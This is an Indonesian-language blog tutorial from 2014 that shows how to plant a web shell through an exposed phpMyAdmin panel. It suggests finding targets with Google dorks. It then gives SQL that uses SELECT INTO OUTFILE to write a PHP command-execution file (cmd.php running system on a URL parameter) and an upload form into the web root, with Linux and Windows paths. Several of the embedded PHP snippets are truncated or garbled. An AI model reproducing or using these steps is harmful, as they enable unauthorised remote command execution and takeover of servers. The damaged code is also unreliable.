0 upload shell dari phpmyadmin

di Selasa, April 08, 2014
halaman phpmyadmin biasa ada di http://www.situs.com/phpmyadmin
atau bisa dicari dengan dork google
[URL=http://s1375.photobucket.com/user/monroelou7/media/login_zps4c6f7620.jpg.html][IMG]http://i1375.photobucket.com/albums/ag457/monroelou7/login_zps4c6f7620.jpg[/IMG][/URL]

Kemudian masukkan script SQL pada form yang tersedia :
untuk sistem operasi Unix :[spoiler]
[code]DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('"; system($cmd); echo "
"; exit; } ?>');
SELECT * INTO OUTFILE '[color=#FF4500]/opt/lampp/htdocs/cmd.php[/color]' from temptab;
DROP TABLE temptab;
FLUSH LOGS;[/code]
[/spoiler]
untuk sistem operasi windows :[spoiler]
[code]DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('"; system($cmd); echo ""; exit; } ?>');
SELECT * INTO OUTFILE '[color=#FF4500]C:/xampp/htdocs/cmd.php[/color]' from temptab;
DROP TABLE temptab;
FLUSH LOGS;[/code][/spoiler]

KLIK GO !!

Note : maksud dari kode berwarna merah adalah jika XAMPP terinstall di direktori lain. silahkan ganti yang berwarna merah sesuau dengan direktori XAMPP target

 Your SQL Query has been executed successful
lanjutkan ke step berikutnya

Itu artinya kita udah bisa membuka file cmd.php, silahkan buka http://localhost/cmd.php?cmd=Masukkan perintah OS (Linux atau Windows)
Contoh : [color=#FF0000]http://localhost/cmd.php?cmd=ls[/color] <-- adalah="" br="" dan="" di="" dir.="" direktori="" file="" isi="" kalo="" linux="" ls="" mesin="" ngeliat="" pake="" perintah="" untuk="" windows="" ya="">
 Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL

Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux[spoiler]
[code]DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('
Upload file :

');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;[/code][/spoiler]

*Untuk mesin Windows[spoiler]
[code]DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('


Upload file :

');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;[/code][/spoiler]

Dan kemudian Klik Go!

Ulangi lagi kita buka PhpMyAdminnya, kemudian pilih menu SQL

Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux[spoiler]
[code]DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "

";?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;[/code][/spoiler]

*Untuk mesin Windows[spoiler]
[code]DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "
";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
[/code][/spoiler]
Dan kemudian Klik Go!
Ane anggep sukses, sekarang buka http://localhost/form.php
[URL=http://s1375.photobucket.com/user/monroelou7/media/upload_zps579949bf.jpg.html][IMG]http://i1375.photobucket.com/albums/ag457/monroelou7/upload_zps579949bf.jpg[/IMG][/URL]

Silahkan di upload Shellnya atau file .php, .html, .htm, .txt, dan lain sebagainya.
Home » » » upload shell dari phpmyadmin

0 Comments

Bagaimana Pendapat Anda ?

Langganan: Posting Komentar (Atom)
 
Copyright © 2012 uba
Desain Template oleh Donstera